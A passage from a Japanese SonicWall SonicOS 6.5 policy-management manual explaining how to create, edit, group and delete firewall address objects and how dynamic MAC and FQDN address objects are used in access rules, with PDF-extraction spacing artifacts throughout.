いアドレス グループの場合は、 このセクションに 「リストなし」 と表示されます。

• 設定 - エン ト リごとに編集アイコンと削除アイコンが表示されます。 削除できるのは、 ユーザ

定義アド レス オブジェ ク ト とアド レス グループのみです。 また、 編集できるのは、 個別エン

ト リ と一部の既定のエン ト リのみです。 編集または削除できないエン ト リのアイコンは淡色表示になります。

エン ト リの並べ替え「アドレス オブジェ ク ト」 画面と 「アドレス グループ」 画面には、 アドレス オブジェク ト とアドレ

ス グループを見やすくするためのテーブルが表示されます。

テーブルのエン ト リを並べ替えるには、 列見出しを選択します。 登録は昇順または降順で並べ替えられます。 列登録の右側にある矢印が、 並べ替え状況を示します。 下向きの矢印は昇順を意味します。上向きの矢印は、 降順 (アルファベッ ト A-Z または上から 0 から始まる数字) を示します。

既定のアドレス オブジェク トおよびアドレス グループ「既定」 表示では、 フ ァイアウォールの既定のアドレス オブジェ ク トおよびアドレス グループが表

示されます。 一方の画面で 「既定」 表示を選択すると、 他方の画面でのこの表示が選択されます。 既定のアドレス オブジェ ク トのエン ト リは変更や削除ができませんが、 既定のアドレス グループは変

更や削除が可能です。 そのため、 次のようになっています。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定188

• 「アドレス オブジェク ト」 画面では、 編集アイコンと削除アイコンは淡色表示になっています。

• 「アドレス グループ」 画面では、 編集アイコンはほとんどのエン ト リで、 削除アイコンは少数を

除くすべてのエン ト リで淡色表示になっています。 編集または削除が可能なエン ト リでは、 そうした操作に必要なアイコンが使用可能になっています。

既定の Pref64 アドレス オブジェク ト NAT64 機能をサポートするために、 SonicOS では新しい既定のネッ トワーク アドレス オブジェク トで

ある Pref64 が作成されています。 これは NAT64 ポリ シーのための変換前の送信先であ り、 常に

pref64::/n となります。 すべてのアドレスを pref64::/n で表して、 NAT64 を実行できるすべて

の IPv6 クライアン ト を表すネッ トワーク種別のアドレスオブジェク ト を作成できます。 例:

Well-Known Prefix の 64:ff9b::/96 は SonicOS によって自動的に作成されます。 Pref64 の詳細につい

ては、 Pref64::/n の使用 (107 ページ) および NAT64 ポリシーのための WAN から WAN へのアクセス ルー

ルの作成 (146 ページ) を参照して ください。

アドレス オブジェク トの追加アドレス オブジェ ク トは、 NAT ポリシー、 アクセス ルール、 サービスを設定する前に定義する必要

があります。

アドレス オブジェク ト を追加するには、 以下の手順を実行します。

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 「アドレス オブジェク ト」 画面で、 ページの上部にある 「追加」 を選択して、 「アドレス オブ

ジェク トの追加」 ダイアログを表示します。

3 「名前」 フ ィールドに、 VAP のわかりやすいネッ トワーク アドレス オブジェク トの名前を入力

します。

4 「ゾーンの割り当て」 ドロップダウン リストからアドレス オブジェク トのゾーンを選択します。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定189

5 「種別」 ドロップダウンリス トから次のいずれかを選択し、 「種別」 を選択すると表示される関連フ ィールドを入力します。

• ホスト - 「IP アドレス」 フ ィールドに IP アドレスを入力します。

• 範囲 - 「開始アドレス」 フ ィールド と 「終了アドレス」 フ ィールドに開始アドレスと終

了アドレスを入力します。

• 「ネッ トワーク」 および 「ネッ トマスク/接頭辞長」 フ ィールドに、 ネッ トワーク IP アド

レスとネッ トマスク (255.255.255.0 など) またはプレフ ィ ックス長 (24 など) を入力します。

• 「MAC」 を選択した場合は、 「MAC アドレス」 フ ィールドに MAC アドレス (00:11:f5:1b:e3:cf など) を入力し、 必要に応じて、 「マルチホーム ホスト」 チェ ッ クボッ

クスをオンにします (既定でオンになっています)。 MAC アドレス オブジェク トの詳細に

ついては、 動的アドレス オブジェク ト : 機能と利点を参照して ください。

• FQDN - 「FQDN ホスト名」 フ ィールドに、 個々のサイ トまたはサイ トの範囲 (ワイルドカー

ド ‘*’ を使用) のド メイン名を入力します。 必要に応じて DNS 登録のTTLの手動設定を選択

し、 関連フ ィールドに存続時間を秒単位で入力します。 小値は 120、 大値は 86400です。 FQDN アド レス オブジェ ク トの詳細については、 動的アドレス オブジェ ク ト : 機

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定190

能と利点テーブルを参照して ください。

6 「追加」 を選択します。

必要に応じて、 この手順を使用して別のオブジェク ト を追加します。

7 終了したら 「閉じる」 を選択します。

アドレス オブジェク トの編集

アドレス オブジェク ト を編集するには、 次の手順に従います。

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 必要に応じて、 「アドレス オブジェク ト」 ボタンを選択して、 「アドレス オブジェク ト」 画

面を表示します。

3 「アドレス オブジェク ト」 テーブルの 「設定」 カラムにある編集アイコンを選択します。 「ア

ド レス オブジェ ク トの編集」 ウ ィ ン ドウが開き、 「ア ド レス オブジェ ク トの追加」 ウ ィ ン ド

ウと同じ設定項目が表示されます (アドレス オブジェク トの追加 (189 ページ) を参照)。

4 完了したら 「OK」 を選択します。

ユーザ定義アドレス オブジェク トの削除

ユーザ定義のアドレス オブジェク ト を削除するには :

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 必要に応じて、 「アドレス オブジェク ト」 ボタンを選択して、 「アドレス オブジェク ト」 画

面を表示します。

3 「設定」 カラムで、 削除するアドレス オブジェク トに対応する削除アイコンを選択します。

4 確認のダイアログ ボックスで 「OK」 を選択し、 アドレス オブジェク ト を削除します。

1 つ以上のユーザ定義のアドレス オブジェク ト を削除するには、 以下の手順に従います。

1 「オブジェク ト > アドレス オブジェク ト」 ページで、 「アドレス オブジェク ト」 画面を表示し

ます。

2 削除するエン ト リのチェ ックボックスを選択します。

メモ : 編集できるのは、 ユーザ定義アドレス オブジェク ト と一部の既定のアドレス オブジェク

トのみです。

メモ :削除できるのは、 ユーザ定義アドレス オブジェク トのみです。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定191

3 ページ上部にある 「削除」 ドロップダウン リス トから 「選択の削除」 を選択します。

4 確認のダイアログ ボックスで 「OK」 を選択します。

すべてのユーザ定義アドレス オブジェク ト を削除するには :

1 「オブジェク ト > アドレス オブジェク ト」 ページで、 「アドレス オブジェク ト」 画面を表示し

ます。

2 ページ上部にある 「削除」 ドロップダウン リス トから 「すべて削除」 を選択します。

3 確認のダイアログ ボックスで 「OK」 を選択します。

MAC または FQDN アドレス オブジェク トの消去「消去」 は、 MAC または FQDN アドレス オブジェ ク トから古い ARP または DNS 情報を削除するため

に使用します。

1 つまたは複数の MAC または FQDN アドレス オブジェク ト を消去するには :

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 必要に応じて、 「アドレス オブジェク ト」 ボタンを選択して、 「アドレス オブジェク ト」 画面

を表示します。

3 消去するエン ト リのチェ ックボックスを選択します。

4 「消去」 ボタンを選択して、 「消去」 を選択します。

すべての MAC または FQDN アドレス オブジェク ト を消去するには :

1 「オブジェク ト > アドレス オブジェク ト」 ページで、 「アドレス オブジェク ト」 画面を表示し

ます。

2 「消去」 ボタンを選択して、 「すべて消去」 を選択します。

アドレス グループの作成ファイアウォールに追加されたアドレス オブジェ ク トの数が増えてきたら、 アド レスのグループを

作成するこ とで、 アド レスやアクセス ポリシーの管理を容易にするこ とができます。 グループに加

えた変更は、 アドレス グループ内の各オブジェ ク トに適用されます。 アドレス グループには、 アド

レス オブジェク トだけでな く、 他のアドレス グループも含めることができます。

アドレス オブジェク ト を追加するには :

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 ページの上部にあるアドレス グループ ボタンを選択します。

3 「アドレス グループ」 画面で 「追加」 を選択し、 を追加すると、 「アドレス オブジェク ト グループの追加」 ダイアログが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定192

4 グループに付ける説明的な一意の名前を 「名前」 フ ィールドに入力します。

5 左側のリストから目的のアドレス オブジェク トまたはグループを選択し、 右矢印を選択しま

す。 選択した項目が右側のリス トに移動します。 Ctrl または Shift キーを押しながら選択する

と、 複数のオブジェク ト を選択できます。

グループから項目を削除するには、 右の列で項目を選択し、 左矢印を選択します。 選択した項目は、 右側のリス トから左側のリス トに移動します。

6 「OK」 を選択します。

アドレス グループの編集

アドレス グループを編集するには :

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 「アドレス グループ]ボタンを選択すると、 「アドレス グループ」 画面が表示されます。

3 「アドレス グループ」 テーブルの編集可能なエン ト リの 「設定」 列の 「編集」 アイコンを選択

します。 「アドレス グループの編集」 ウィ ンドウが表示されます。

4 名前を変更するには、 「名前」 フ ィールドを編集します。

5 グループに項目を追加するには、 左側のリス トから目的のアドレスオブジェク トまたはグループを選択し、 右矢印を選択します。 選択した項目が右側のリス ト に移動します。 Ctrl または

Shift キーを押しながら選択すると、 複数のオブジェク ト を選択できます。

グループから項目を削除するには、 右の列で項目を選択し、 左矢印を選択します。 選択した項目は、 右側のリス トから左側のリス トに移動します。

6 完了したら 「OK」 を選択します。

アドレス グループの削除

カスタム アドレス グループを削除するには :

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

メモ :編集できるのはユーザ定義および一部の規定のアドレス グループのみです。 削除できる

のはユーザ定義アドレス グループのみです。

メモ : カスタム アドレス グループだけを削除できます。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定193

2 「アドレス グループ」 ボタンを選択すると、 「アドレス グループ」 画面が表示されます。

3 アドレス オブジェク ト を削除するには、 「設定」 カラムで、 削除するアドレス グループに対

応する 「削除」 アイコン を選択します。

4 確認のダイアログ ボックスで 「OK」 を選択し、 アドレス グループを削除します。

1 つ以上のカスタムアドレスグループを削除するには :

1 「オブジェク ト > アドレス オブジェク ト」 ページで、 「アドレス グループ」 ボタンを選択して、

「アドレス グループ」 画面を表示します。

2 削除するエン ト リのチェ ックボックスを選択します。

3 ページ上部にある 「削除」 ドロップダウン リス トから 「選択の削除」 を選択します。

4 確認のダイアログ ボックスで 「OK」 を選択します。

すべてのカスタム アドレス グループを削除するには :

1 「オブジェク ト > アドレス オブジェク ト」 ページで、 「アドレス グループ」 ボタンを選択して、

「アドレス グループ」 画面を表示します。

2 ページ上部にある 「削除」 ドロップダウン リス トから 「すべて削除」 を選択します。

3 確認のダイアログ ボックスで 「OK」 を選択します。

動的アドレス オブジェク トの使用SonicOS では初期のバージ ョ ンから常に、 ユーザ インターフ ェースのほとんどの領域において、 IP アドレスを表すためにアドレス オブジェ ク トが使われてきました。 アドレス オブジェ ク トの種別につ

いては、 アドレス オブジェク トの種別 (183 ページ) を参照して ください。

SonicOS は、 2 種類の動的アドレス オブジェク ト をサポート します。

• MAC - SonicOS では、 ファイアウォールの ARP キャッシュを参照することにより、 MAC AO を IPアドレスに解決します。

• FQDN - 完全修飾ド メイン名 (例えば "www.reallybadwebsite.com" など) は、 ファイアウォールの

設定で指定されている DNS サーバを使用して (1 つまたは複数の) IP ア ド レスに解決されま

す。 ‘*’ を使用するワイルド カード エン ト リ もサポート されており、 ワイルド カードを指定す

ると、 承認済み DNS サーバへの問い合わせに対する応答が収集されるようになります。

ト ピック :

• 動的アドレス オブジェク トの主要な機能 (194 ページ)

• ネッ トワーク上の承認済みサーバの使用の強制 (196 ページ)

• MAC および FQDN 動的アドレス オブジェク トの使用 (198 ページ)

動的アドレス オブジェク トの主要な機能

動的アド レス オブジェ ク ト (DAO) とは、 MAC AO および FQDN AO の使用を可能にする基底フレーム

ワークのことを表す用語です。 アクセス ルールは、 アドレス オブジェ ク ト を静的な構造から動的な

構造に変換することによって、 ネッ トワークの変化に自動的に対応できます。

動的アドレス オブジェク ト : 機能と利点テーブルには、 DAO の詳細と例が示されています。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定194

動的アドレス オブジェク ト : 機能と利点

機能 利点

FQDN ワイルドカードのサポー ト

FQDN アドレス オブジェク トでは*.somedomainname.com のようなワイルドカード エン トリがサポート されています。 ワイルドカード エン ト リが指定された場合は、 まず基本ド メイ

ン名が解決されて、 それに対して定義されているすべてのホスト IP アドレスに変換され、 そ

の後、 ファイアウォールを通過する DNS 応答のアクティブな収集が継続的に行われます。

例えば、 *.myspace.com の FQDN AO を作成すると、 まずファイアウォールの設定で指定されている DNS サーバが使用されて、 myspace.com が 63.208.226.40、63.208.226.41、 63.208.226.42、 63.208.226.43、 に解決されます (このことは nslookup myspace.com、 またはそれと同等のコマンドによって確認できます)。 ほとん

どの DNS サーバではゾーン転送は許可されないので、 通常はド メ イン内のすべてのホス ト

を自動的に列挙することはできません。 それに代わる方法と して、 フ ァイアウォールは、フ ァ イアウォールを通過する DNS 応答を監視して、 承認済み DNS サーバから発信されたDNS 応答を探します。 そのため、 フ ァイアウォールの背後のホス トが外部 DNS サーバに対して問い合わせを行った場合、 そのサーバがファイアウォール上の設定済み/定義済み DNSサーバであるときには、 その応答がファイアウォールによって解析され、 いずれかのワイルドカード FQDN AO のド メインに一致するかどうかが調べられます。

メモ :補足: "承認済み DNS サーバ" とは、 フ ァイアウォールが使用する DNS サーバと して設定されている DNS サーバのこ とです。 承認済み DNS サーバからの応答のみをワイルド

カードの学習プロセスで使用する理由は、 意図的に不正なホス ト エン ト リが設定された未承認 DNS サーバの使用によって FQDN AO のポイズニングが発生する危険を防止するためで

す。 SonicOS の将来のバージョ ンでは、 すべての DNS サーバからの応答をサポートするオプ

シ ョ ンが提供される可能性があります。 アクセス ルールを使う と、 承認済み DNS サーバの使用を強制することができます。 その方法については、 この後のネッ トワーク上の承認済みサーバの使用の強制 (196 ページ) で説明します。

例と して、 4.2.2.1 と 4.2.2.2 の DNS サーバを使用するようにファイアウォールが設定されていて、 フ ァイアウォールで保護されているすべてのクライアン トに対して DHCP 経由でこれらの DNS サーバが提供されている場合を考えてみまし ょ う。 フ ァイアウォールで

保護されているクライアン ト A が vids.myspace.com に対応するアドレスの問い合わせを 4.2.2.1 または 4.2.2.2 に対して行ったとすると、 ファイアウォールでは、 それに対

する応答が検査され、 定義済みの *.myspace.com FQDN AO に一致するものと判断されます。 そして、 その問い合わせの結果 (63.208.226.224) は、 *.myspace.com DAO に対

応する解決済みの値として追加されます。

メモ :上記の例で、 *.myspace.com AO が作成される前に、 クライアン ト A のワークス

テーシ ョ ンが vids.myspace.com を解決して、 その結果をキャ ッシュ していたとすると、 クライアン トは新しい DNS 要求を発行する代わりにリゾルバのキャッシュを使用する

ので、 フ ァイアウォールによる vids.myspace.com の解決は行われません。 そのため、別のホス ト によ って vids.myspace.com の解決が行われない限り、 フ ァ イアウォールは

vids.myspace.com について学習する機会を得られないこ とにな り ます。 MicrosoftWindows を使用しているワークステーシ ョ ンでは、 ipconfig /flushdns コマンドを使用して、ローカル リゾルバのキャッシュを消去することができます。 このキャ ッシュの消去を行う

と、 ク ラ イアン トはすべての FQDN を解決するよ うになるので、 それらのアクセス時にファイアウォールがその解決の情報を取得することが可能になります。

ワイルドカード FQDN エン ト リは、 そのド メイン名のコンテキストに含まれるすべてのホ

スト名に解決されます (アドレス オブジェク トあたり 大 256 エン ト リまで)。 例えば、

*.sonicwall.com と指定されている場合、 www.sonicwall.com、software.sonicwall.com、 licensemanager.sonicwall.com は、 それぞれの IP アドレスに解決されますが、 sslvpn.demo.sonicwall.com は別のコンテキストのド メイン名であるため解決されません。 ワイルドカード FQDN AO によって sslvpn.demo.sonicwall.com を解決するには、 *.demo.sonicwall.com というエン

ト リを指定する必要があります。 このエン ト リを指定した場合は、sonicos-enhanced.demo.sonicwall.com、 csm.demo.sonicwall.com、sonicos-standard.demo.sonicwall.com などのド メイン名も解決されます。

メモ : ワイルド カードは、 部分一致ではな く 完全一致のみをサポー ト します。 つまり、*.sonicwall.com は正当な入力ですが、 w*.sonicwall.com、 *w.sonicwall.com、および w*w.sonicwall.com は違います。 ワイルドカードはエン ト リごとに 1 つしか指定

できないので、 例えば *.*.sonicwall.com は機能しません。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定195

ネッ トワーク上の承認済みサーバの使用の強制 ネッ トワーク上の承認済みサーバ (許可されたサーバ) の使用を強制するこ とは必須ではありません

が、 そのような設定を行う ことをお勧めします。 この設定は不正なネッ トワーク活動の抑止に有効であるだけでな く、 FQDN ワイルド カードの解決プロセスの信頼性を確保するためにも役立ちます。 一

般に、 既知のプロ ト コルによる通信のエンドポイン トは可能な限り明確に定義することが望ましいと言えます。 以下に例を示します。

• 承認済みサーバ (SMTP サーバ、 DNS サーバなど) のアドレス グループを作成します。

DNS の使用によ

る FQDN の解決

FQDN アドレス オブジェク トは、 ファイアウォールの 「ネッ トワーク > DNS」 ペー

ジで設定された DNS サーバを使用して解決されます。 DNS 登録は複数の IP アドレ

スに解決される場合が多いので、 FQDN AO 解決プロセスは、 AO あたり 大 256 個の登録までの範囲で、 ホス ト名に対応するアドレスをすべて取得します。 解決プロセスでは、 FQDN の IP アド レスへの解決だけでな く、 DNS 管理者による設定に

基づいて、 登録の TTL (存続期間) の関連付けも行われます。 この TTL は、 古く なっ

た FQDN 情報が使われることを防ぐために利用されます。

動的 ARP キャッ

シュ データの使

用による MAC アドレスの解決

フ ァ イアウォールのいずれかの物理セグメ ン ト において、 ARP (Address ResolutionProtocol) メ カニズムによって ノー ドが検出される と、 フ ァ イアウォールの ARPキャ ッシュが更新され、 そのノードの MAC アド レスと IP アド レスが追加されま

す。 この更新が発生した場合、 そのノードの MAC アドレスを参照する MAC アドレ

ス オブジェク トが存在するときには、 解決されたアドレスのペアを使用して、 その

アドレス オブジェ ク トが直ちに更新されます。 ノードが使われな く なって、 その

ノードの ARP キャッシュがタイムアウト した場合 (ホスト とファイアウォールの L2接続が切断された場合など) には、 その MAC AO は未解決状態に移行します。

MAC アドレス オブジェク トによるマルチホームのサポート

MAC AO ではマルチホームのノードをサポートする設定を使用できます。 マルチ

ホームのノード とは、 物理インターフ ェースごとに複数の IP アドレスが割り当て

られているノードのことです。 各 AO では 大 256 個の解決済みエン ト リを指定で

きます。 この方法を使用すると、 1 つの MAC アドレスが複数の IP アドレスに解決

される場合でも、 そのすべての IP アドレスに対して、 その MAC AO を参照するア

クセス ルールなどが適用されるようになります。

自動と手動の更新処理

MAC AO エン ト リはフ ァ イアウォールの ARP キャ ッ シュに自動的に同期され、

FQDN AO エン ト リには DNS エン ト リの TTL 値が適用されるため、 解決済みの値は

常に新しい状態に保たれます。 これらの自動的な更新処理に加えて、 個々の DAOまたは定義済みのすべての DAO を対象と して手動で更新および削除を実行するこ

ともできます。

DNS の使用によ

る FQDN の解決

FQDN アドレス オブジェク トは、 ファイアウォールの 「ネッ トワーク > DNS」 ペー

ジで設定された DNS サーバを使用して解決されます。 DNS 登録は複数の IP アドレ

スに解決される場合が多いので、 FQDN AO 解決プロセスは、 AO あたり 大 256 個の登録までの範囲で、 ホス ト名に対応するアドレスをすべて取得します。 解決プロセスでは、 FQDN の IP アド レスへの解決だけでな く、 DNS 管理者による設定に

基づいて、 登録の TTL (存続期間) の関連付けも行われます。 この TTL は、 古く なっ

た FQDN 情報が使われることを防ぐために利用されます。

動的アドレス オブジェク ト : 機能と利点

機能 利点

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定196

• 該当するゾーンのアクセス ルールを作成して、 内部ネッ トワーク上の承認済み SMTP サーバに

のみ SMTP 通信の発信を許可し、 それ以外のすべての SMTP 発信ト ラフ ィ ッ クを遮断すること

により、 意図的または意図しないスパムの送信を防止します。

• 該当するゾーンのアクセス ルールを作成して、 内部ネッ トワーク上の承認済み DNS サーバに

対して、 すべての宛先ホスト との DNS プロ ト コル (TCP/UDP 53) による通信を許可します。

• 該当するゾーンのアクセス ルールを作成して、 ファイアウォールで保護されたホストからの DNS(TCP/UDP 53) 通信を承認済み DNS サーバに対してのみ許可し、 それ以外のすべての DNS アクセ

スを遮断することにより、 未承認の DNS サーバとの通信の発生を防止します。

• 上記のルール設定後に、 許可されていないアクセスが試行された場合は、 ログの表示によってそのことを確認できます。

重要 : 内部ネッ トワーク上に DNS サーバを設置している場合は、 必ずこのルールを定義

したうえで、 アクセスを制限する次の DNS ルールを設定する必要があります。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定197

MAC および FQDN 動的アドレス オブジェク トの使用

MAC および FQDN の動的アドレス オブジェ ク ト を使用すると、 アクセス ルールを非常に柔軟な形で

作成できるようになります。 MAC アドレス オブジェ ク トおよび FQDN アドレス オブジェ ク トの設定

は、 静的アドレス オブジェ ク トの場合と同じ方法で 「オブジェ ク ト > アドレス オブジェ ク ト」 ペー

ジから行います。 動的アド レス オブジェ ク トの作成後に、 その表示項目にマウスを合わせると、 そ

のオブジェ ク トの状況が表示されます。 また、 動的アドレス オブジェ ク トの追加や削除を行う と、

その操作がイベン ト と してログに記録されます。

動的アド レス オブジェ ク トは、 さまざまな用途に使用できます。 以下に示す例は、 可能な活用方法

のご く一部にすぎません。

ト ピッ ク : :

• FQDN DAO の使用による、 ド メインに対するすべてのプロ ト コルのアクセス遮断 (198 ページ)

• FQDN ベースのアクセス ルールに適した内部 DNS サーバの使用 (200 ページ)

• MAC アドレスによる動的ホストのネッ トワーク アクセスの制御 (201 ページ)

• ド メ イン全体へのアクセスの帯域幅管理 (203 ページ)

FQDN DAO の使用による、 ド メインに対するすべてのプロ ト コルのアク

セス遮断

非標準ポート を使った処理や、 未知のプロ ト コルの使用、 暗号化やトンネル化 (またはその両方) によ

る ト ラフ ィ ッ クの意図的な不明瞭化などを行っているという理由から、 特定の送信先 IP アドレスへ

のすべてのプロ ト コルのアクセスを遮断することが望ましい場合があります。 具体的な例としては、ホーム ネッ トワークのト ンネルを通すことによって ト ラフ ィ ッ クを不明瞭化するという目的で、 DSLモデムまたはケーブル モデムに接続されたホーム ネッ トワーク上に HTTPS プロキシ サーバを設定し

た場合 (あるいはその他の方法で、 53、 80、 443 などの“信頼できる"ポー ト、 および 5734、 23221、63466 などの非標準ポートのポート転送/ ト ンネル化を行っている場合) などが考えられるでし ょ う。

このようなネッ トワークではポートが予測不能であるだけでな く、 多くの場合、 IP アドレスも動的に

設定されるため同様に予測不能となり、 状況はさらに複雑化します。

これらのシナリオでは、 通常、 ユーザによるホーム ネッ ト ワークの特定ができるよ うに動的 DNS(DDNS) 登録が利用されるので、 FQDN AO を積極的に使えば DDNS レジスト ラに登録されているすべて

のホストへのアクセスを遮断できます。

想定条件

• 10.50.165.3 と 10.50.128.53 の DNS サーバを使うようにファイアウォールが設定されて

いるとします。

• ファイアウォールは、 ファイアウォールで保護されているすべてのユーザに対して DHCP リース

を提供しているものとします。 ネッ トワーク上のすべてのホストは上記の設定済み DNS サーバ

を使用して解決を行います。

• 未承認 DNS サーバへの DNS 通信を遮断したければアクセス ルールを使います。 ネッ ト

ワーク上の承認済みサーバの使用の強制 (196 ページ) を参照して ください。

メモ : ここでは例として DDNS ターゲッ トの場合を示しています。 非 DDNS ターゲッ ト ド メ イン

も同様に使用できます。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定198

• DSL ホーム ネッ トワークのユーザが DDNS プロバイダ DynDNS に登録しているホスト名が moosifer.dyndns.org であると します。 このセッシ ョ ンで ISP がこの DSL 接続に割り当てた

アドレスは、 71.35.249.153 であるとします。

• 同じ IP アドレスに対して別のホスト名を登録することは容易なので、 後からホスト名が

追加されることを想定して FQDN AO を使用しています。 必要に応じて、 別の DDNS プロ

バイダに対応するエン ト リを追加することもできます。

手順 1 - FQDN アドレス オブジェク トの作成:

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 必要に応じて、 「アドレス オブジェク ト」 ボタンを選択して、 「アドレス オブジェク ト」 画

面を表示します。

3 「追加」 を選択し、 次の FQDN アドレス オブジェク ト を作成します。

初に作成された時点では、 dyndns.org のアドレス (例えば、 63.208.196.110) のみがこのエン ト

リの解決先になります。 ファイアウォールで保護されているホストが承認済み DNS サーバを使

用して moosifer.dyndns.org の解決を試行した場合、 その問い合わせに対する応答と して返され

た (1 つまたは複数の) IP アドレスが FQDN AO に動的に追加されます。

手順 2 - アクセス ルールの作成

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 ページを開きます。

2 「追加」 を選択し、 次のアクセス ルールを作成します。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定199

この FQDN に含まれるターゲッ ト ホス トへのアクセスはプロ ト コルに関係な く遮断され、 アク

セスが試行された場合は、 そのイベン トがログに記録されます。

FQDN ベースのアクセス ルールに適した内部 DNS サーバの使用

DHCP で動的に構成されるネッ ト ワーク環境は、 内部ホス トの登録を動的に行うために、 内部 DNSサーバと組み合わせて運用されるのが一般的であり、 広く使われている Microsoft の DHCP サービスと

DNS サービスもその一例です。 このようなネッ トワークでは、 ネッ トワーク上のホスト を設定するこ

とによって、 適切に設定された DNS サーバ上の DNS レコードの動的更新を容易に実現するこ とがで

きます (詳細については、 Microsoft のサポート技術情報 「Windows Server 2003 で DNS 動的更新を構成

する方法」 (http://support.microsoft.com/kb/816592/ja) などを参照して ください)。

次の図は、 典型的な DNS 動的更新プロセスのパケッ トの詳細情報を示したものです。 この例では、

動的に設定されたホスト (10.50.165.249) が、 (DHCP で提供された) DNS サーバ (10.50.165.3) に対し

て、 完全なホスト名 (bohuymuth.moosifer.com) を登録していることがわかります。

メモ : 送信元と して LAN Subnets を指定する代わりに、 必要に応じて、 より限定的な送信

元を指定するこ とによって、 特定のホス トからの送信のみを対象と してターゲッ トへのアクセスを禁止することもできます。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定200

このような環境では、 FQDN AO を利用して、 ホス ト名によるアクセス制御を行う ことが有益な場合が

あります。 この方法が も有効に適用できるのは、 ネッ トワーク内のホス ト名が既知の場合 (ホス ト

名のリス トが保持されている場合や、 一貫した名前付け規則が使用されている場合など) です。

MAC アドレスによる動的ホストのネッ トワーク アクセスの制御

ほとんどのネッ トワークでは静的なアドレス設定よりも DHCP が利用されることの方がはるかに多い

ため、 特に、 動的な DNS 更新が行われていない場合や、 ホスト名が常に確定しているとは言えない環

境では、 動的に設定されるホス トの IP アド レスを予測するのが困難な場合があります。 このよ うな

状況では、 MAC アドレス オブジェク ト を使用することにより、 ほぼ不変の MAC (ハードウェア) アド

レスに基づいてホストのアクセスを制御することができます。

その他のほとんどのアクセス制御方法と同様、 MAC アド レスによるアクセス制御も、 アクセスを原

則的に許可して特定のホス トまたはホス トのグループを送信先/送信元とするアクセスのみを禁止す

る方法と、 アクセスを原則的に禁止して特定のホストまたはホス トのグループに対してのみアクセスを許可する方法のどちらでも利用できます。 ここでは、 例と して後者の場合を示します。

DHCP 対応の複数の無線クライアン トがあり、 それらのクライアン トで独自のオペレーテ ィ ング シス

テムが実行されているため、 ユーザ レベルの認証は一切利用できないと仮定します。 このとき、 そ

れらのクライアン トに LAN 上のアプリケーシ ョ ン固有のサーバ (例えば、 10.50.165.2) へのアクセ

スのみを許可することを考えます。 WLAN セグメン トではセキュリテ ィのために WPA-PSK が使用され

ていますが、 これらのクライアン トからのアクセスを許可する対象は 10.50.165.2 のサーバのみで

あり、 LAN 上のそれ以外のリソースへのアクセスはすべて禁止しなければなりません。 また、 その他

のすべての無線クライアン トに対しては、 10.50.165.2 へのアクセスのみを禁止し、 それ以外の場

所へのアクセスはすべて許可する必要があります。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定201

手順 1 - MAC アドレス オブジェク トの作成

MAC アドレス オブジェク ト を作成するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 必要に応じて、 「アドレス オブジェク ト」 ボタンを選択して、 「アドレス オブジェク ト」 画面

を表示します。

3 「追加」 を選択し、 次の MAC アドレス オブジェク ト を作成します (マルチホームのオプシ ョ ン

は必要に応じて選択します)。

4 アドレス オブジェク トの作成完了時点において、 対象のホストがファイアウォールの ARP キャッ

シュに含まれている場合は、 直ちにその解決が行われます。 ARP キャ ッシュ内にホス トの情報

が存在しない場合は、 ホストが有効化されて ARP によって検出されるまでの間、 「アドレス オブジェク ト」 テーブルにはそれらのアドレスが 「未解決」 状態として表示されます。

5 ハンド ヘルド デバイス用のアドレス グループを作成します。

手順 2 - アクセス ルールの作成

アクセス ルールを作成するには :

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 ページを開きます。

2 「追加」 を選択し、 サンプルのアクセス ルールテーブルに示されている設定で 4 つのアクセス

ルールを作成します。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定202

ド メイン全体へのアクセスの帯域幅管理

スト リーミング メディアは、 ネッ トワークの帯域幅を も大量に消費するサービスの 1 つです。 スト

リー ミ ング メデ ィ アを配信しているサイ ト では、 ほとんどの場合、 多数のサーバからなるサーバ

ファームが利用されているため、 これらのサイ トへのアクセスを制御したり、 サイ トへの接続に割り当てられる帯域幅を管理したりすることは容易ではありません。 さらに、 これらのサイ トではメディアが再エンコード されてから HTTP で送信される場合が多いので、 種別による分類や分離を行う こ と

はいっそう難し く なっています。 これらのサイ ト を構成しているサーバのリス ト を手動で管理するのは困難な仕事ですが、 ワイルドカード FQDN アドレス オブジェク ト を使用すると、 その作業を簡単化

することができます。

手順 1 - FQDN アドレス オブジェク トの作成

FQDN アドレス オブジェク ト を作成するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 必要に応じて、 「アドレス オブジェク ト」 ボタンを選択して、 「アドレス オブジェク ト」 画

面を表示します。

3 「追加」 を選択します。

4 次のアドレス オブジェク ト を作成します。

